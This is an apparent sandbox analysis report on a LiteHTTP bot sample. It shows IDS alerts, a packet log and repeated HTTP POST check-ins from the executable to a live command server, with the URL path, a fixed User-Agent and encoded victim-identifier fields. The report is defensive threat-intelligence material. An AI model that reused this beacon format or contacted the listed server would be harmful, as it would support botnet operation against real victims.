                                    2024-10-30T12:26:01.097855+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999887.120.126.580TCP
                                    2024-10-30T12:26:14.160383+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999987.120.126.580TCP
                                    2024-10-30T12:26:14.651363+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999987.120.126.580TCP
                                    2024-10-30T12:26:14.651363+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999987.120.126.580TCP
                                    2024-10-30T12:26:18.597880+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.75000087.120.126.580TCP
                                    2024-10-30T12:26:19.087674+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.75000087.120.126.580TCP
                                    2024-10-30T12:26:19.087674+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.75000087.120.126.580TCP
                                    Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                    Oct 30, 2024 12:25:36.682137966 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:36.682225943 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.682225943 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.682791948 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.688160896 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.035238028 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:37.040751934 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.531061888 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.546988964 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.547049046 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:47.832520962 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:47.838083982 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:48.801666021 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:48.968751907 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:48.968852043 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:48.968986034 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:48.977957964 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.316513062 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:49.353657007 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.817302942 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.828653097 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.828720093 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.067327023 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.067358017 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.072777033 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.073003054 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.073003054 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.073873043 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.074088097 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.078476906 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.113967896 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.114415884 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.120070934 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.120084047 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.120183945 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.120187998 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.120354891 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.125798941 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.426018953 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.431895971 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.473267078 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.478575945 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.884582996 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.892601967 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.892868996 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.953432083 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.960656881 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.961069107 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.248963118 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.255220890 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:00.255290985 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.265825033 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.271712065 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:00.271774054 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.272008896 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.277286053 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:00.633143902 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.640536070 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:01.089189053 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:01.097759008 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:01.097855091 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.801675081 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.801676035 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.807122946 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:13.807455063 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:13.807543039 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.807543993 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.807681084 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.812916040 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.160382986 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:14.165743113 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.634841919 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.651279926 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.651362896 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.238888025 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.239130974 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.244543076 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:18.244645119 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.244684935 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:18.244750977 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.244823933 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.250200033 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:18.597879887 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.606069088 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:19.077151060 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:19.087575912 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:19.087673903 CET5000080192.168.2.787.120.126.5
                                    • 87.120.126.5
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.7 | 49975 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:23:14.246436119 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:23:14.597901106 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:23:15.064409018 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:23:15.081238031 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:23:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.7 | 49976 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:23:38.407999992 CET | 194 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Oct 30, 2024 12:23:38.754592896 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:23:39.230674028 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:23:39.251087904 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:23:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    2 | 192.168.2.7 | 49977 | 87.120.126.5 | 80 | 2908 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:23:53.679069042 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:23:54.035523891 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:23:54.500469923 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:23:54.521398067 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:23:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    3 | 192.168.2.7 | 49978 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:23:59.329658985 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:23:59.675539970 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:00.173748016 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:00.189933062 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    4 | 192.168.2.7 | 49979 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:02.654419899 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:03.014358997 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:03.476713896 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:03.485270977 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    5 | 192.168.2.7 | 49980 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:09.354286909 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:09.706768990 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:10.187701941 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:10.200161934 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    6 | 192.168.2.7 | 49981 | 87.120.126.5 | 80 | 2908 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:14.760262966 CET | 194 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Oct 30, 2024 12:24:15.115757942 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:15.583427906 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:15.599507093 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.7 | 49982 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:17.121619940 CET | 194 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Oct 30, 2024 12:24:17.472443104 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:17.936234951 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:17.950364113 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    8 | 192.168.2.7 | 49983 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:20.213377953 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:20.567019939 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:21.023513079 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:21.045025110 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    9 | 192.168.2.7 | 49984 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:25.494616985 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:25.847443104 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:26.306341887 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:26.317204952 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    10 | 192.168.2.7 | 49985 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:28.970891953 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:29.322052002 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:29.787497044 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:29.796834946 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
